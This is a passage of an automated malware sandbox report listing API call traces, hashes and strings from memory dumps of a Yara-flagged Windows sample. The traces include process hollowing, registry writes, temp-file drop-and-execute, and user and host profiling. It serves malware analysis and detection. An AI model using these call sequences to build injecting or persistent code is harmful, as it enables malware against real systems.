                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: Code
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 3609698214-2980165447
                                                                                        • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                        • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                        • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                        • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000400,?), ref: 026192E2
                                                                                        • wsprintfA.USER32 ref: 02619350
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02619375
                                                                                        • lstrlen.KERNEL32(?,?,00000000), ref: 02619389
                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 02619394
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0261939B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 2439722600-2980165447
                                                                                        • Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                        • Instruction ID: 0b543809f75eb3f5a302b430a0b900b6df51f884b278a5b1d820f80f8e7e75af
                                                                                        • Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                        • Instruction Fuzzy Hash: 051184B17402147FE7246731EC0DFEF3A6EDBC8B11F048069BF09E5090EEB59A418A68
                                                                                        APIs
                                                                                        • GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
                                                                                        • wsprintfA.USER32 ref: 004090E9
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                        • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 2439722600-2980165447
                                                                                        • Opcode ID: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                        • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                        • Opcode Fuzzy Hash: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                        • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02619A18
                                                                                        • GetThreadContext.KERNEL32(?,?), ref: 02619A52
                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 02619A60
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02619A98
                                                                                        • SetThreadContext.KERNEL32(?,00010002), ref: 02619AB5
                                                                                        • ResumeThread.KERNEL32(?), ref: 02619AC2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                        • String ID: D
                                                                                        • API String ID: 2981417381-2746444292
                                                                                        • Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                        • Instruction ID: 3adbf57ff7773a0d85b947bbd01f4eaeb2178b27659444ec678e88985656341b
                                                                                        • Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                        • Instruction Fuzzy Hash: 44213BB1E02219BBDB119BA1DC09EEFBBBCEF04750F444061BA19E1190EB759A44CBA4
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(004102D8), ref: 02611C18
                                                                                        • LoadLibraryA.KERNEL32(004102C8), ref: 02611C26
                                                                                        • GetProcessHeap.KERNEL32 ref: 02611C84
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 02611C9D
                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 02611CC1
                                                                                        • HeapFree.KERNEL32(?,00000000,00000000), ref: 02611D02
                                                                                        • FreeLibrary.KERNEL32(?), ref: 02611D0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
                                                                                        • String ID:
                                                                                        • API String ID: 2324436984-0
                                                                                        • Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                        • Instruction ID: 937f823c50db36ea6593985e3d175f139a75537f352e49acd4e969e945d17785
                                                                                        • Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                        • Instruction Fuzzy Hash: 0C315E31D00219FFCB119FA4DC889EEBAB9EB46305B2844BAE605E2250D7B55E80DB94
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,PromptOnSecureDesktop), ref: 0040E3E6
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                        • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                        • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 1586453840-2980165447
                                                                                        • Opcode ID: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                        • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                        • Opcode Fuzzy Hash: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                        • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404290
                                                                                        • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                        • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CreateEvent
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 1371578007-2980165447
                                                                                        • Opcode ID: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                        • Instruction ID: 580dd723e2696739ab8c529274da47b2bc3b4765397f1bbb4cd5042057411b76
                                                                                        • Opcode Fuzzy Hash: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                        • Instruction Fuzzy Hash: F94181B1900209BADB109BA2CD45F9FBFBCEF40355F104566F614B21C1D7789A51DBA4
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02616CE4
                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02616D22
                                                                                        • GetLastError.KERNEL32 ref: 02616DA7
                                                                                        • CloseHandle.KERNEL32(?), ref: 02616DB5
                                                                                        • GetLastError.KERNEL32 ref: 02616DD6
                                                                                        • DeleteFileA.KERNEL32(?), ref: 02616DE7
                                                                                        • GetLastError.KERNEL32 ref: 02616DFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
                                                                                        • String ID:
                                                                                        • API String ID: 3873183294-0
                                                                                        • Opcode ID: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction ID: ba36685e482cad1246b4353134d0ebb92c6c1a860f3c4759a8b2e37aebd1b677
                                                                                        • Opcode Fuzzy Hash: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction Fuzzy Hash: 8131237AD00249BFCB00DFA5DD44ADEBF7EEB48300F088069E611E32A0D770A6418B65
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 026193C6
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 026193CD
                                                                                        • CharToOemA.USER32(?,?), ref: 026193DB
                                                                                        • wsprintfA.USER32 ref: 02619410
                                                                                          • Part of subcall function 026192CB: GetTempPathA.KERNEL32(00000400,?), ref: 026192E2
                                                                                          • Part of subcall function 026192CB: wsprintfA.USER32 ref: 02619350
                                                                                          • Part of subcall function 026192CB: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02619375
                                                                                          • Part of subcall function 026192CB: lstrlen.KERNEL32(?,?,00000000), ref: 02619389
                                                                                          • Part of subcall function 026192CB: WriteFile.KERNEL32(00000000,?,00000000), ref: 02619394
                                                                                          • Part of subcall function 026192CB: CloseHandle.KERNEL32(00000000), ref: 0261939B
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02619448
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 3857584221-2980165447
                                                                                        • Opcode ID: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                        • Instruction ID: 5069e02735c60c11ddbbc03bc3b0cf85e4853bdc38b1f235a7b1715badb1d0c6
                                                                                        • Opcode Fuzzy Hash: ff085cb3efc643ea3343cce32a213b77a8dc5f084f98a1949d4da58a8db7cba0
                                                                                        • Instruction Fuzzy Hash: CD019EF69001187BDB20A7619D89EDF3B7CDB95701F0000A6BB09E2080EAB4A6C48F75
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,PromptOnSecureDesktop), ref: 0040915F
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                        • CharToOemA.USER32(?,?), ref: 00409174
                                                                                        • wsprintfA.USER32 ref: 004091A9
                                                                                          • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
                                                                                          • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                          • Part of subcall function 00409064: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                          • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                          • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                          • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 3857584221-2980165447
                                                                                        • Opcode ID: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                        • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                        • Opcode Fuzzy Hash: 69a42f15c0bdb603acf61cfacf6d4b07552c73bbecf68ccfe74a45dc0564b67a
                                                                                        • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: $localcfg
                                                                                        • API String ID: 1659193697-2018645984
                                                                                        • Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                        • Instruction ID: d107bfa2c9435e27208d45145c514475e64629a4b5b2f9d21126432efe107cc9
                                                                                        • Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                        • Instruction Fuzzy Hash: 3E713871E01344AADF218BD4DD85FEE376AAB01319F2C402AF904A62D0DF62BDC4CB59
                                                                                        APIs
                                                                                          • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                          • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                          • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                          • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000), ref: 0040DDB5
                                                                                        • lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
                                                                                        • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
                                                                                        • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                        • String ID: flags_upd$localcfg
                                                                                        • API String ID: 204374128-3505511081
                                                                                        • Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                        • Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
                                                                                        • Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                        • Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
APIs
  • Part of subcall function 0261DF6C: GetCurrentThreadId.KERNEL32 ref: 0261DFBA
• lstrcmp.KERNEL32(00410178,00000000), ref: 0261E8FA
• lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,02616128), ref: 0261E950
• lstrcmp.KERNEL32(?,00000008), ref: 0261E989
Strings
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: lstrcmp$CurrentThreadlstrcpyn
• String ID: A$ A$ A
• API String ID: 2920362961-1846390581
• Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
• Instruction ID: 69986b6fe92590b8cca1ea8a79acfb1d8b5975a1cfe0ed06719f8ed09025ef64
• Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
• Instruction Fuzzy Hash: 6331BC31A007459FCB75CF24C884BAA7BE8EB09725F08892AE99587654D372F880CB85
APIs
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: Code
• String ID:
• API String ID: 3609698214-0
• Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
• Instruction ID: c3c250325527ba8b9ae982e3963c938b65232edce1e44862d4d2ecc46110ffcc
• Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
• Instruction Fuzzy Hash: BA216076108115FFDB149B70FC48EDF3FADDB49365B148525F502D1190EB71EA4096B8
APIs
• GetTickCount.KERNEL32 ref: 0040DD0F
• GetCurrentThreadId.KERNEL32 ref: 0040DD20
• GetTickCount.KERNEL32 ref: 0040DD2E
• Sleep.KERNEL32(00000000,?,75920F10,?,00000000,0040E538,?,75920F10,?,00000000,?,0040A445), ref: 0040DD3B
• InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
• GetCurrentThreadId.KERNEL32 ref: 0040DD53
Memory Dump Source
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
• String ID:
• API String ID: 3819781495-0
• Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
• Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
• Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
• Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
APIs
• GetTickCount.KERNEL32 ref: 0261C6B4
• InterlockedIncrement.KERNEL32(0261C74B), ref: 0261C715
• CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0261C747), ref: 0261C728
• CloseHandle.KERNEL32(00000000,?,0261C747,00413588,02618A77), ref: 0261C733
Strings
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
• String ID: localcfg
• API String ID: 1026198776-1857712256
• Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
• Instruction ID: 81627d23570bb100ce28012f81dabe9075870426df43f2b6a42b2991bd62cdea
• Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
• Instruction Fuzzy Hash: 9B518CB1A40B418FC7248F69C9D462ABBE9FB48300B64693FE18BC7A90D774F840CB51
APIs
• RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 0040815F
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 00408187
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 004081BE
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 00408210
  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 0040677E
  • Part of subcall function 0040675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 0040679A
  • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 004067B0
  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 004067BF
  • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 004067D3
  • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,75920F10,00000000), ref: 00406807
  • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040681F
  • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 0040683E
  • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040685C
  • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
  • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
Strings
Memory Dump Source
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
• String ID: PromptOnSecureDesktop
• API String ID: 124786226-2980165447
• Opcode ID: f41c48beccc796d99ac39a3e9a8e7a8285e468a1565ebf528982a8b7ec716e81
• Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
• Opcode Fuzzy Hash: f41c48beccc796d99ac39a3e9a8e7a8285e468a1565ebf528982a8b7ec716e81
• Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
APIs
• RegCreateKeyExA.ADVAPI32(80000001,0261E50A,00000000,00000000,00000000,00020106,00000000,0261E50A,00000000,000000E4), ref: 0261E319
• RegSetValueExA.ADVAPI32(0261E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0261E38E
• RegDeleteValueA.ADVAPI32(0261E50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0261E3BF
• RegCloseKey.ADVAPI32(0261E50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0261E50A), ref: 0261E3C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: Value$CloseCreateDelete
• String ID: PromptOnSecureDesktop
• API String ID: 2667537340-2980165447
• Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
• Instruction ID: e325552437fefec6247cb9df89fe0360f1a95a2c3d9e82bedb1b5976a74bf9aa
• Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
• Instruction Fuzzy Hash: F3214C71A0021DABDF209FA4EC89EDE7F79EF08750F088025F905E6160E372DA54DBA0
APIs
• RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
• RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
• RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
• RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
Strings
Memory Dump Source
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: Value$CloseCreateDelete
• String ID: PromptOnSecureDesktop
• API String ID: 2667537340-2980165447
• Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
• Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
• Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
• Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
APIs
• GetUserNameA.ADVAPI32(?,?), ref: 026171E1
• LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02617228
• LocalFree.KERNEL32(?,?,?), ref: 02617286
• wsprintfA.USER32 ref: 0261729D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: Name$AccountFreeLocalLookupUserwsprintf
• String ID: |
• API String ID: 2539190677-2343686810
• Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
• Instruction ID: fad81b6df7a659c36631617c3ba25fa3611afa948bde9daf47b11c6f7152742c
• Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
• Instruction Fuzzy Hash: 4C311A72900208BBDB01DFA8DC45BDA7BACEF04314F18C066F959DB200EB75E6498B94
APIs
• gethostname.WS2_32(?,00000080), ref: 0040AD1C
• lstrlenA.KERNEL32(00000000), ref: 0040AD60
• lstrlenA.KERNEL32(00000000), ref: 0040AD69
• lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: lstrlen$gethostnamelstrcpy
• String ID: LocalHost
• API String ID: 3695455745-3154191806
• Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
• Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
• Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
• Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
APIs
• GetLocalTime.KERNEL32(?), ref: 0261B51A
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0261B529
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0261B548
• GetTimeZoneInformation.KERNEL32(?), ref: 0261B590
• wsprintfA.USER32 ref: 0261B61E
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
